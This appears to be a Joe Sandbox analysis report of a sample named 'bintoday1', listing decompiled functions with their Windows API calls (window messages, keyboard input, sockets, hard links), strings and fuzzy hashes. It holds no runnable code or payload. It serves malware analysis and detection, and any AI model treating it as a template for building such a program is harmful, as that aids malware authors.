Instruction Fuzzy Hash: 1421087220462967D731AA249C42FB773D8EF61710F1440BAFA49D7141EBA1DD4AC295

Function 00C237B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C23840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C23850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C23876

Strings

Listbox, xrefs: 00C2380F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 0369cc1145228656bc4eeaeb63d7c569aa382bfe5f32eb9417dc6eb955c797bf
Instruction ID: 06ad21ddbd3d8b6af1a6229bf62723e6522711d0674c139041e3134ad48e7695
Opcode Fuzzy Hash: 0369cc1145228656bc4eeaeb63d7c569aa382bfe5f32eb9417dc6eb955c797bf
Instruction Fuzzy Hash: 1F21BE72610228BBEF218F54EC85FAB376AEF89B50F118125F9109B590CA75DD528BA0

Function 00C049F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C04A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C04A5C
SetErrorMode.KERNEL32(00000000,?,?,00C2CC08), ref: 00C04AD0

Strings

%lu, xrefs: 00C04A6F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: b0db9a6f19cc78794a187852b7c3717819771333ba838ff1595f7d50110446b2
Instruction ID: 1f1979e3f9084d72f2e9d44188ba288d0ae149f8f6271243c73e045f081e856b
Opcode Fuzzy Hash: b0db9a6f19cc78794a187852b7c3717819771333ba838ff1595f7d50110446b2
Instruction Fuzzy Hash: 96315375A00109AFDB10DF54C885EAE7BF8EF04304F1480A9F905DB252DB71EE46CB61

Function 00C241EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C2424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C24264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C24271

Strings

msctls_trackbar32, xrefs: 00C24226

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: ffe0f12f271cf4174c0fda7077527fbd4874da381ecb7f25ce097afc4426abe1
Instruction ID: 529b9f9d2bd22f574f0be1cc9771821a42a51dd9d4f10a172ff4339f5812ed59
Opcode Fuzzy Hash: ffe0f12f271cf4174c0fda7077527fbd4874da381ecb7f25ce097afc4426abe1
Instruction Fuzzy Hash: E111E331240218BFEF205E29DC46FAB3BACEF95B54F010124FA55E2090D2B1D8619B20

Function 00BF2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

Part of subcall function 00BF2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BF2DC5
Part of subcall function 00BF2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BF2DD6
Part of subcall function 00BF2DA7: GetCurrentThreadId.KERNEL32 ref: 00BF2DDD
Part of subcall function 00BF2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00BF2DE4

GetFocus.USER32 ref: 00BF2F78

Part of subcall function 00BF2DEE: GetParent.USER32(00000000), ref: 00BF2DF9

GetClassNameW.USER32(?,?,00000100), ref: 00BF2FC3
EnumChildWindows.USER32(?,00BF303B), ref: 00BF2FEB

Strings

%s%d, xrefs: 00BF2FFF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 309f144f1b5dc97c2ed3fee0613ca26fd99bfcc519a380759a42c5a580254c7c
Instruction ID: a21a880c61d9a1062612565240dcc9420c5c4a9417856ed085ee1e47b4bda560
Opcode Fuzzy Hash: 309f144f1b5dc97c2ed3fee0613ca26fd99bfcc519a380759a42c5a580254c7c
Instruction Fuzzy Hash: 2011AF756002096BDF157F708CC6FFE77EAAF84304F0480B5BA099B292DE70994E8B60

Function 00C25882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C258C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C258EE
DrawMenuBar.USER32(?), ref: 00C258FD

Strings

0, xrefs: 00C2588F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: dff2f33ac03df6fd1ff6eb06bd24202331b22b8b20f567d7acd49c3b95683cfd
Instruction ID: 572b62ec84fbf95a032753a4e00448a8059a1be664725404d270a867b6e633fe
Opcode Fuzzy Hash: dff2f33ac03df6fd1ff6eb06bd24202331b22b8b20f567d7acd49c3b95683cfd
Instruction Fuzzy Hash: 70018C31514228EFDB21AF51EC44BEFBBB4FF45360F1080AAE849D6151DB308A85EF21

Function 00BF007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b918d2384d66ddf360cdafba14523846ab4eac1e9dd7c89de7fbce3d3e4b97
Instruction ID: 9a5ee2254eaaa2ffae47e7e929966c1e0e391225a9f4f833746aed5d9613513c
Opcode Fuzzy Hash: 35b918d2384d66ddf360cdafba14523846ab4eac1e9dd7c89de7fbce3d3e4b97
Instruction Fuzzy Hash: 9AC13975A1020AAFDB14DFA4C894ABEB7F5FF48704F108598E605EB262D731EE45CB90

Function 00BC3E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00BC3F0B
__alldvrm.LIBCMT ref: 00BC410C
__alldvrm.LIBCMT ref: 00BC412E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: 59e67491aa03013542cf34ad6da1d518a9bfc78a7976e257fdb5715e4fe8a73f
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: 68A13571E003869FDB21CF18C8A1FAABFE5EF65350F1885EEE5959B281C3348A81C750

Function 00C1342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C13459
CoUninitialize.OLE32 ref: 00C13463
VariantInit.OLEAUT32(?), ref: 00C1346E
VariantClear.OLEAUT32(?), ref: 00C1371B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 74a59e3c1e5c69fbe7b8dcf91b3b86fdd9be5be19e3089d96a1c36ab4a3f2796
Instruction ID: b211b7de1b5eb41a59ae74fdedfb89a445bce3f738bbc55cb7d98b6d575a99dc
Opcode Fuzzy Hash: 74a59e3c1e5c69fbe7b8dcf91b3b86fdd9be5be19e3089d96a1c36ab4a3f2796
Instruction Fuzzy Hash: A6A19E752183009FCB00DF24C495A6AB7E5FF89714F05889DF98A9B362DB30EE45DB91

Function 00BF0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C2FC08,?), ref: 00BF05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C2FC08,?), ref: 00BF0608
CLSIDFromProgID.OLE32(?,?,00000000,00C2CC40,000000FF,?,00000000,00000800,00000000,?,00C2FC08,?), ref: 00BF062D
_memcmp.LIBVCRUNTIME ref: 00BF064E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 2cb149046a98d089b527ffcef4698fd43eb340cde1c0408e564dfaa21d21b694
Instruction ID: cb87660c8f08a37b051d234229cce887fed06080bb7b890e505c4342cf3d3eae
Opcode Fuzzy Hash: 2cb149046a98d089b527ffcef4698fd43eb340cde1c0408e564dfaa21d21b694
Instruction Fuzzy Hash: 95810C71910109EFCB04DF94C984EEEB7F9FF89315F104598E606AB261DB71AE0ACB60

Function 00BD1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BD14C0

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2541f37764c5a38afb7f68bab6e1c8320145aa9ee0e2b0e59a106754d554f2ff
Instruction ID: 39c60ce0e7d8ea2ce55e51de54dcd808cd74dff938b61ce2ea26ae9ca5a1148a
Opcode Fuzzy Hash: 2541f37764c5a38afb7f68bab6e1c8320145aa9ee0e2b0e59a106754d554f2ff
Instruction Fuzzy Hash: 6F414935600501BBDB256FBD9C86BBEBAE4EF41330F144AEBF418D2392F6B448415E61

Function 00C26278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00FBE898,?), ref: 00C262E2
ScreenToClient.USER32(?,?), ref: 00C26315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C26382

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 656b2f1ec8300de0b3646faf00244ff61b3de68b77182ee2581ba3a595cd2bc8
Instruction ID: 36ff27c22fc86120ea120fb418cb762b82604a95f365272b88ce2eccb16d375c
Opcode Fuzzy Hash: 656b2f1ec8300de0b3646faf00244ff61b3de68b77182ee2581ba3a595cd2bc8
Instruction Fuzzy Hash: 78513E74900219EFDF20DF68E880AAE7BB5FF45360F148169F925976A0D730EE41CBA0

Function 00C11AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C11AFD
WSAGetLastError.WSOCK32 ref: 00C11B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C11B8A
WSAGetLastError.WSOCK32 ref: 00C11B94

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 763fc02ef411bed7965cdce34fac5d22ee29847c4f9eaaff53c0ed5920c64b9a
Instruction ID: 098153d0d0df49dc2172a72353c6c9cd29cc76dca06f15adaedb0cda0ea1e1a5
Opcode Fuzzy Hash: 763fc02ef411bed7965cdce34fac5d22ee29847c4f9eaaff53c0ed5920c64b9a
Instruction Fuzzy Hash: F441E574600200AFDB20AF24C886F697BE5AB45718F54C498FA199F3D3D776ED818B90

Function 00BCB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0baabd312509e4be4f4e7bfb9cae52e28de860b01cbf0e5f4144ce5de8a65c26
Instruction ID: db473704c02c605ae1e0d2e564b315ebb659ccb11adf864d530a61cde657a702
Opcode Fuzzy Hash: 0baabd312509e4be4f4e7bfb9cae52e28de860b01cbf0e5f4144ce5de8a65c26
Instruction Fuzzy Hash: BC41B075A04704AFD7289F78CC42FAEBBE9EB88710F1045AEF551DB382D77199018790

Function 00C056D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C05783
GetLastError.KERNEL32(?,00000000), ref: 00C057A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C057CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C057FA

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 50b8fd7921556580260449359dac0743d16601e37ac3595a024f25f62eb190e7
Instruction ID: b697b5770d798dd125602f1a0ffb8643db4d163e26b69f65f9db805042e65451
Opcode Fuzzy Hash: 50b8fd7921556580260449359dac0743d16601e37ac3595a024f25f62eb190e7
Instruction Fuzzy Hash: 46412935214610DFCB10DF15C594A1EBBE2EF99720B19C498E85AAB3A2CB30FD01CB91

Function 00BCD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00BB6D71,00000000,00000000,00BB82D9,?,00BB82D9,?,00000001,00BB6D71,8BE85006,00000001,00BB82D9,00BB82D9), ref: 00BCD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BCD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BCD9AB
__freea.LIBCMT ref: 00BCD9B4

Part of subcall function 00BC3820: RtlAllocateHeap.NTDLL(00000000,?,00C61444,?,00BAFDF5,?,?,00B9A976,00000010,00C61440,00B913FC,?,00B913C6,?,00B91129), ref: 00BC3852

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 6489f5b92be58832be9ccf7d245390df5f4a9668503860cbf9b40f153159ed16
Instruction ID: 701294212315e119b6262a08f0b42fad9d679e90ee751eafd7fab6cf93ddb05a
Opcode Fuzzy Hash: 6489f5b92be58832be9ccf7d245390df5f4a9668503860cbf9b40f153159ed16
Instruction Fuzzy Hash: 97319A76A0020AABDF249F64DC85FEE7BE5EB41710B0542ACFC04D6291EB75CD51CBA0

Function 00C252C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00C25352
GetWindowLongW.USER32(?,000000F0), ref: 00C25375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C25382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C253A8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: ee771b78d800c11df57dcdcebe929381cbd8d7155093888b66ade8c68124f6e1
Instruction ID: 54ce70d72f30ee0044b9d8d1f5294a7250b435f4ac03ff4a3ccd9ac2f5b3b603
Opcode Fuzzy Hash: ee771b78d800c11df57dcdcebe929381cbd8d7155093888b66ade8c68124f6e1
Instruction Fuzzy Hash: 2D31C534A55A28EFEB30DF14EC45BEA37A5AB04390F586101FA21969F1C7B09E409B51

Function 00BFAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00BFABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 00BFAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 00BFAC74
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00BFACC6

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9d8b0856b340fc587a666881ba4a48b6d3710f4ed3826263651ced6013816b78
Instruction ID: ec59327b2ee3e01efed330ab6679bdb77365d5d81d67b5e620614aff42d85633
Opcode Fuzzy Hash: 9d8b0856b340fc587a666881ba4a48b6d3710f4ed3826263651ced6013816b78
Instruction Fuzzy Hash: BB3128B0A0071C6FEF38CB658C447FE7BE5EB49310F04429AE689531D0C375998D8752

Function 00C27674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C2769A
GetWindowRect.USER32(?,?), ref: 00C27710
PtInRect.USER32(?,?,00C28B89), ref: 00C27720
MessageBeep.USER32(00000000), ref: 00C2778C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 6cbf68717c2afefc77b98f9a1f6ee0683ce90bad866ca025163462be045d6042
Instruction ID: aac94abe5d78166ce1cc349633c8197b4efb89868be423b7661b42dd48136f88
Opcode Fuzzy Hash: 6cbf68717c2afefc77b98f9a1f6ee0683ce90bad866ca025163462be045d6042
